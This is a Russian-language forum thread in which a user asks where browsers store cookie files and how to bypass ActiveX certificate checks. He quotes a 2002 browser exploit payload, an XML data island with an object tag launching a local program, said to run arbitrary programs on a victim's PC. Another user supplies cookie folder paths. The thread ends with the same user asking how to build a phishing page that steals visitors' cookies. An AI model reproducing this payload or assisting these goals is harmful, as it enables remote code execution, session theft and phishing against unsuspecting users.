Сообщений в теме: 4

[oler117]

Драсте!..   У меня 2 вопроса:
1) Напишите плиз по каким путям сохраняются файлы Cookies в Mozila, NetscapeNavigator, Opera.
2) Как обойти проверку сертификата ActiveX при загрузке страницы? Нашел только об уязвимости, которая позволяет запускать программы на ПК жертвы...

Цитата

Рассмотрим известный пример уязвимости найденной в марте 2002 года, и присутствующей практически во всех версиях операционных систем и браузеров:

<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security><exploit><![CDATA[			 
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111"  codebase="c:/WINDOWS/calc.exe"></object>			 
]]></exploit></security>
</xml>

Данная уязвимость позволяет запускать любые программы на машине пользоваетля (если известен локальный путь к ним).

[$iD]

Цитата

1) Напишите плиз по каким путям сохраняются файлы Cookies в Mozila, NetscapeNavigator, Opera.

Firefox: Documents and Settings\имя_пользователя\Application Data\Mozilla\Firefox\Profiles\
Opera: Documents and Settings\имя_пользователя\Application Data\Opera\Opera\profile\

В Netscape не знаю.

[FreeCat]

$iD

Цитата

В Netscape не знаю.

Да примерно такой же путь   .

[oler117]

Спс     А как на счет 2-го вопроса?

[oler117]

Понятно...   Ну тогда еще одно... Хочу создать фишинговую страницу, которая тырит кукиз у того, кто на нее зашел. Это возможно?